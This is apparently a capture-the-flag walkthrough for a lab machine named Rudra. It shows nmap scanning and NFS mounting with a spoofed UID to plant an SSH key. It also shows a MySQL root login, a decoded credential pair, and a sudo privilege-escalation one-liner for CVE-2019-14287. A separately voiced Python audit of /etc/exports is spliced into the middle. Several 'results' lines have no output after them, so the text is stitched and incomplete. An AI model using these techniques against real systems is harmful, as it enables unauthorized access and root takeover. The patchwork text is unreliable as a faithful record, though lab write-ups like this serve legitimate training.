Rudra Walkthrough
We start by scanning the host with:
nmap -A -T4 -p- 192.168.1.19 -vv

The dirb scan gave these results:

As we can see from the nmap output, there must be an exported drive (an NFS share) that we can list with:
showmount -e 192.168.1.19

Now we access this drive by entering the following commands:
mkdir shivay
mount -t nfs 192.168.1.19:/home/shivay ~/shivay
mount -t nfs -o vers=3 192.168.1.4:/home/shivay ~/shivay
ls -ld shivay
drwxr-xr-x 2 1002 1002 4096 Oct 21 16:54 shivay
groupadd --gid 2008 shivay_group
useradd --uid 2008 --groups shivay_group shivay_user

OK, I don’t believe this file is useful. Now let’s create an .ssh folder and copy our keys to it so we are able to SSH to the host. We create .ssh inside the shivay folder and generate new keys:

mkdir shivay/.ssh
cp ~/.ssh/id_rsa.pub shivay/.ssh/authorized_keys
And we got in … nice.
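
The NFS step above works because NFSv3 with AUTH_SYS trusts the UID the client sends, so a writable home-directory export lets any permitted client add its own key to .ssh/authorized_keys. As an added example (not part of the original walkthrough), here is a small audit of /etc/exports that flags this kind of export; the sample exports content and the names parse_exports and audit_exports are constructed for illustration.

```python
import re

# Constructed sample /etc/exports (illustrative; not read from the target).
SAMPLE_EXPORTS = """\
/home/shivay  *(rw,sync,no_subtree_check)
/srv/backup   192.168.1.0/24(ro,sync) 192.168.1.50(rw,sync)
/home/admin   10.0.0.5(rw,no_root_squash)   # one trusted client
/srv/pub      (ro)
"""

# One client entry: optional host pattern followed by optional "(options)".
ENTRY = re.compile(r"^([^()\s]*)(?:\(([^)]*)\))?$")


def parse_exports(text):
    """Yield (path, client, options) for each client entry in exports text."""
    # Join backslash-continued lines, then strip comments line by line.
    for raw in text.replace("\\\n", " ").splitlines():
        fields = raw.split("#", 1)[0].split()
        if not fields:
            continue
        # A path with no client list, or a bare "(opts)", applies to any host.
        for entry in fields[1:] or [""]:
            m = ENTRY.match(entry)
            if m:
                opts = {o.strip() for o in (m.group(2) or "").split(",") if o.strip()}
                yield fields[0], m.group(1) or "*", opts


def audit_exports(text):
    """Return sorted (path, client, issue) findings for risky exports."""
    findings = set()
    for path, client, opts in parse_exports(text):
        kerberos = any(o.startswith("sec=krb5") for o in opts)
        if client in ("*", "0.0.0.0/0"):
            findings.add((path, client, "exported to any host"))
        if "rw" in opts and not kerberos and (path + "/").startswith("/home/"):
            # AUTH_SYS trusts the client's UID, so a matching local UID can
            # write ~/.ssh/authorized_keys as the directory owner.
            findings.add((path, client, "writable home directory over AUTH_SYS"))
        if "no_root_squash" in opts:
            findings.add((path, client, "no_root_squash: client root is server root"))
    return sorted(findings)


if __name__ == "__main__":
    for path, client, issue in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:14} {client:16} {issue}")
```

On a real server, pass the contents of /etc/exports to audit_exports; restricting clients, exporting read-only, or requiring sec=krb5 clears the corresponding findings.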
Running the LinEnum.sh script gave us this:

So we connect to MySQL with:
mysql -u root


Next, we change directory to /media.

Now we have a file named hints; opening it, we find a link to an article. There is another file, creds; viewing it, we see some emojis. Reading the article, we follow these steps:
First, copy the contents of the file creds to a new file on your machine and save it.
Download the git file from the article and then run it.
Select 2) Decloakify a File (locate the file you saved before) and then Enter cipher #: 20
Your file will be saved under a new name. View it, and there is a new username and password that we can use to log in with SSH.

The file content: mahakaal:kalbhairav

It took me a while and a while to figure it out, till I found a link to this exploit:
https://blog.aquasec.com/cve-2019-14287-sudo-linux-vulnerability

sudo -u#-1 watch -x sh -c 'reset; exec sh 1>&0 2>&0' -u
